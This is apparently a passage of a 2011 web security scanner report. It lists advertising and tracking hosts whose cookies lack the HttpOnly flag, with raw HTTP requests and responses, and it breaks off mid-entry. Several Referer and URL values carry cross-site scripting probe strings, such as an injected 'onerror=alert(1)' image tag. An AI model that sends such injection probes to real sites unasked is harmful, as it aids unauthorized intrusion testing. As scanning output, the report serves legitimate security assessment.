HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_PreRollCompanion P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296770644-3981256; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=5F36AEF5D4FB49DB9F81F864E31B34FC; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=c003d4d/243a7/110b9ea7/af02/4d4b2654; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Thu, 03 Feb 2011 22:04:03 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AVE/go/286182932/direct/01/]] HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_WonderPreRoll P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296770649-3995471; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=8EE4F442F1FB4932AD6D6003B4E01B9A; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bcab411/243a7/110ece14/af02/4d4b2659; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Thu, 03 Feb 2011 22:04:08 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/simplemodal/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adServer/adServerESI.aspx HTTP/1.1 Host: core.insightexpressai.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/7.0 Content-Length: 18 Content-Type: text/html; charset=utf-8 Set-Cookie: DW=221e32e71296770758; expires=Wed, 29-Jan-2031 22:05:58 GMT; path=/; domain=insightexpressai.com P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA" Expires: Thu, 03 Feb 2011 22:05:58 GMT Pragma: no-cache Date: Thu, 03 Feb 2011 22:05:58 GMT Connection: close Cache-Control: no-store
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /save HTTP/1.1 Host: delicious.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Date: Thu, 03 Feb 2011 19:35:43 GMT Set-Cookie: BX=ab7m0op6km0sf&b=3&s=10; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.delicious.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Location: http://www.delicious.com/save Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: private Age: 0 Connection: close Server: YTS/1.19.4
The document has moved <A HREF="http://www.delicious.com/save">here</A>.<P> <!-- fe06.web.del.ac4.yahoo.net uncompressed/chunked Thu Feb 3 19:35:43 UTC 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/ HTTP/1.1 Host: developer.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:47:44 GMT Set-Cookie: B=auto2ed6km1j0&b=3&s=j0; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 29638
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/license.html HTTP/1.1 Host: developer.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:04:29 GMT Set-Cookie: B=1pm748p6klrhd&b=3&s=dl; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 22172
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /submit HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 286 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:19 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:19 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842119.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 02:28:36 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Fri, 04 Feb 2011 17:55:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 04 Feb 2011 17:55:19 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ssframework/dt/pt.png?trackcd=1288991585470 HTTP/1.1 Host: dt.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:07:44 GMT Server: Apache p3p: policyref=/w3c/p3p.xml Set-Cookie: behavioralSegments=29_110203|32_110203|263_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:44 GMT; Path=/ Content-Length: 101 Connection: close Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quant.js HTTP/1.1 Host: edge.quantserve.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close ETag: "18334:E0-1152220633-1296770771366" Vary: Accept-Encoding Last-Modified: Thu, 03-Feb-2011 22:06:11 GMT Content-Type: application/x-javascript Set-Cookie: mc=4d4b26d3-59834-71bae-edc2f; expires=Thu, 03-Feb-2021 22:06:11 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Fri, 04 Feb 2011 22:06:11 GMT Content-Length: 5265 Date: Thu, 03 Feb 2011 22:06:11 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1 Host: forums.digitalpoint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=60&slotname=2067036752&w=468&lmt=1296787016&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787016748&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529&correlator=1296787013038&frm=0&adk=2139689042&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=2&dtd=12&xpc=YHKwpL9Wg6&p=http%3A//www.bizfind.us HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: googleads.g.doubleclick.net Proxy-Connection: Keep-Alive Cookie: test_cookie=CheckForPermission
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Set-Cookie: id=2299c2bdf900002f||t=1296786962|et=730|cs=ziqtnqpy; expires=Sun, 03-Feb-2013 02:36:02 GMT; path=/; domain=.doubleclick.net Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT X-Content-Type-Options: nosniff Date: Fri, 04 Feb 2011 02:36:02 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Expires: Fri, 04 Feb 2011 02:36:02 GMT Content-Length: 5976
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#993400;cursor:hand;}body,table,div,ul,li{font-size ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=7707606529&w=728&lmt=1296787013&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787012997&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296787013038&frm=0&adk=1367998553&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=1&dtd=145&xpc=LTjYuEf78i&p=http%3A//www.bizfind.us HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: googleads.g.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:50:59 GMT; path=/; domain=.doubleclick.net X-Content-Type-Options: nosniff Date: Fri, 04 Feb 2011 02:35:59 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Expires: Fri, 04 Feb 2011 02:35:59 GMT Content-Length: 4758
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /grphp HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Fri, 03 Feb 2012 20:32:22 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clickaider.js HTTP/1.1 Host: hit.clickaider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=4d3f2276-241363738113; clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; vid=3e136b53-42127475201;
Response
HTTP/1.1 200 OK Connection: close P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA" Expires: Fri, 04 Feb 2011 20:32:22 GMT Cache-Control: private, max-age=86400 Set-Cookie: vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Fri, 03 Feb 2012 20:32:22 GMT Content-Type: application/x-javascript Content-Length: 9501 Date: Thu, 03 Feb 2011 20:32:22 GMT Server: lighttpd/1.4.18
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pv?lng=156&&lnks=&t=Boardreader%20-%20Forum%20Search%20Engine&c=9f671068-5&r=&tz=-360&var1=main%20page&var3=general%20user&loc=http%3A%2F%2Fboardreader.com%2F&rnd=5831 HTTP/1.1 Host: hit.clickaider.com Proxy-Connection: keep-alive Referer: http://boardreader.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vid=3e136b53-42127475201
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA" Set-Cookie: clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; path=/; domain=.clickaider.com Set-Cookie: sid=4d3f2276-241363738113; path=/; domain=.clickaider.com Cache-Control: no-cache, private, proxy-revalidate, max-age=86400 Pragma: no-cache Content-Type: image/gif Content-Length: 43 Date: Thu, 03 Feb 2011 19:52:09 GMT Server: lighttpd/1.4.18
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/log/log.png?a=logitemaction&CbC=1&CbF=true&EC=3&RC=3&SmC=2&AmN=1&CbM=b25%2F1&admode=preroll&VI=33687174&PRI=1386067554&VC=0&Uzip=N%2FA&RvN=1&RprC=0&ADsn=1&VcaI=96%2C192%2C200&RrC=0&VgI=26d91cdf5493d1dd943311e83ddb679d&SfF=true&AVI=57872&Ust=dc&Uctry=us&AC=4&CI=1426141&PI=626&CC=0&Udma=511&ADI=5945246&VmC=0&VscaI=96&VclF=true&PC=1 HTTP/1.1 Host: l0.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /load/?p=200&g=512 HTTP/1.1 Host: load.exelator.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: EVX=eJyNyjsOgCAQRdG9sIL5ZuCxmAkltaVh76KWNuZWNzkDinNCqmu0PsD3UT%252FAFYWtekaKeRJx7kpfE0oS4T9xkyDnL24P1hdb6sbrAgq5JDk%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxNLaxrASUcFEk%253D; myPAL=eJylkj1PwzAQhv9LvHq4O387U2iEVIlEUALqytiZkfLfubPrtEVVB5iSOM89Pr%252Fnj4w2fx0y9J%252BZQu7Q%252BqRSSqgQrAIPauGXiVeo6w8ZBfOCBXfCAigAZCxAo2iVrdQtmWHMFll0iqIzIWkDFLiIrCvW4WHR2%252Fld76a93jxNehj3UmnXDWK4s4E7Y%252FECixVbGuYZw3iJEYCy0Sv5G25KEKrkrUmiYFXSAgyGz0DqlcBy30dA4RJzvuhSycbqRAEcagICJx8GfX1wDKbGMA589vFlXvS4nR%252B1pMJplIHI4Lz%252Fk09ULdxTsIj%252F0w3Ps6i4w13RyU2w%252BEt3z1CqysUw5yq8rqq9XI%252B8679%252FANW9nC8%253D; BFF=eJztlM1OwzAQhN8lT%252BCfOI6dS1MqRKQmQOpWcEI9cuYIvDtrN0nX7lqiqEeu30zGSbw7R1ty%252B%252FlhObOF46zsV8YYUTTvlpe1bkCQtugfB%252FewfX07dLvOFc3Rqir3TGXgGTVxhCKvRILxXDMUoRXg8oQR8Qnt2q1EraQ20xt6QQaOwOyUTGitEqEbDmQEcMJJRoz9CxkBnHBy%252BF4tCIHMvtv2ZDZwwklGtBsiWwaOnWK%252BkOg4HUlRjEbX6PCY1OcrdwjNMcmVxVJ0Qo1O2GdO2Oe8Egtg3glWwid%252FMe7ValLnWTyrWBCLkD6jFwVBmN1Nuw0jXZ6wmWbXY0S88XlwlBFwYuyGe8oIGJF5xo3QTPE4IWwJE0zFOIxWguc5p2LCphB%252BP7uUP6xF3i95lROSF%252FW%252Fnwpqn4bLg2XgSQAYyYAN%252Febterzwh1YZcQBfFiayftPlplW%252B3LJVdn1zXV9UVC9FV%252FL7Xrq%252Bhm7cOjeumL%252F2Sb42Mg2R6YPM9v%252Fv%252Bm1XO7vJP5xXI9Y%253D; 
TFF=eJydlUtywyAMhu%252BSE%252BgBFsIbH6NbL7zoTHftLpO7FzsJJGBcuQsGhvk%252FvSzkObLG63dEihcEN8EAk6rSZZwjxetnxDEtpz5tsB0HHW%252BNHlc9V3pKq%252BYkYzYi7eA6SmltLx%252FL1%252Fyz9GzTsJeGwASAe2lLCSYdW32dtjwdYcVJxmxE2gWMtteYyPleDqHkEO56V%252FQUPItWMYXWU0uiKgv9h2QgEW8lJYM2It05b43q2cRht%252BlDKPqwo28iCq2f8Nr0oW76LrF9U4DJheHYE7WuHpwRSZcAVuvPAiCcK9hDf7ZgCTtTMBROfUK7kWnR646%252BiUxbP3l%252B3TEbsT5kNtreHgkfPK88x1wmtYwAziPAmbkXj0oCvjvHuSa5kAQE9Xvug%252B8uGetGtQbL2PVZk5JBG5Hu2J%252BIKv8ID%252FPBv8huPg3JhTws%252Fjt4%252BwVfmf5g
Response
HTTP/1.1 200 OK Connection: close X-Powered-By: PHP/5.2.8 P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA Content-Type: application/x-javascript Set-Cookie: xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDSxNjaxrASUUFEU%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com Set-Cookie: myPAL=eJylkstOwzAQRf%252Bl3noxM36M7a4CEVIlEkEJqNsuu2YJ%252FDszdpO2qCoSrPI699i5433BUD4OBdbvhbis0Mdscs5oELyBCGaSm0He0Gp9KKhYVIzDEWMwACgYw0zRIluoazInmK%252ByFAyl4DhbB8QSIh%252Bqtbub7GZ8s9thZ%252B8fB9v1O036ZYHENxYIJyydYalh04xFwTCdYwRgfIpGv%252FJVCUKTvM6SpFiTzAWyk38g80LgZd%252BfgMpl4WLV5dqNt5kYAloCgqAPDmO7SA2u1dB38u%252F98zjZfjM%252BWG1F2qgD0cHF%252BCefquZyj8Ui%252Fk%252FXPY2qkh1uq05PgscfuluGmqoHw51SeJlqe7kcec3psXDpt5wONyDJcL%252B%252BAQnrpp0%253D; expires=Mon, 04-Apr-2011 20:52:27 GMT; path=/; domain=.exelator.com Set-Cookie: TFF=eJydlU1ywyAMhe%252BSE%252BgHIoQ3Pka3XmTRme7aXSZ3L3YSSMC4ogsPHuZ96AlL8hKdi9fviBRPCG6GM8yqSqdpiRSvnxGn9Dj1aYHt9azTrdHjqudKT%252BmpOcmYjUgruI5S2rMvH5ev5efSO5tqZEtDYAbAvbSlmEmvrb5OW56BsOIkYzYirQLGs1dP5Hwvh1ByCHe9K3oKnkUrT6GN1JKoykL%252FIRlIxFtJyaCNSHvOW109izjsFn0IRR929I2j0MYJr0Uf6qLvEts3BZhdOB9HojbUgzMiaROg0y7InQtAGLuwh370whI2cmEonOqEdp1p0euOvnGmbZw8v%252B6YjVgbmY1nb03CB%252B2VP4zLpJYRwHkEODP3ElFJwHfnONckF5KAoO7nPvgekrEuVKtZxm7MmpQM2oi0x37AVf4RHuaDf5HdfBqSC3l4%252BQ34GCsed6v%252B0GrmhpN8I4eSfJJDSUrmbMTtF8bmQ6U%253D; expires=Fri, 03-Jun-2011 20:52:27 GMT; path=/; domain=.exelator.com Date: Thu, 03 Feb 2011 20:52:27 GMT Server: HTTP server Content-Length: 92
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps HTTP/1.1 Host: maps.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /maps/stk/lc?client=ca-pub-3033999741136561&lc_format=map_inset_ad&ll=41.946689%2C-87.722974&spn=0.009576%2C0.017166&z=15&ads_params=format%3A125x125_as%2Coutput%3Ahtml%2Ch%3A125%2Cw%3A125%2Clmt%3A1296787023%2Cchannel%3A5653360264%2Cad_type%3Atext%2Ccolor_bg%3Ac4d4f3%2Ccolor_border%3Ae5ecf9%2Ccolor_line%3Ac4d4f3%2Ccolor_link%3A0000cc%2Cflash%3A0%2Curl%3Ahttp%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)%2Cadsafe%3Ahigh%2Cuiv%3A1%2Cdt%3A1296787023670%2Cshv%3Ar20100101%2Cjsv%3Ar20100101%2Ccorrelator%3A1296787013038%2Cfrm%3A0%2Cadk%3A3364239293%2Cga_vid%3A1487308896.1296787013%2Cga_sid%3A1296787013%2Cga_hid%3A720933573%2Cga_fc%3A1%2Cu_tz%3A-360%2Cu_his%3A0%2Cu_java%3A1%2Cu_h%3A1200%2Cu_w%3A1920%2Cu_ah%3A1156%2Cu_aw%3A1920%2Cu_cd%3A16%2Cu_nplug%3A0%2Cu_nmime%3A0%2Cbiw%3A1172%2Cbih%3A684%2Cfu%3A0%2Cjs%3Auds%2Ceid%3A37464000%2Chl%3Aen HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: maps.google.com Proxy-Connection: Keep-Alive
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000cc;cursor:hand;}body,table,div,ul,li{font-size ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
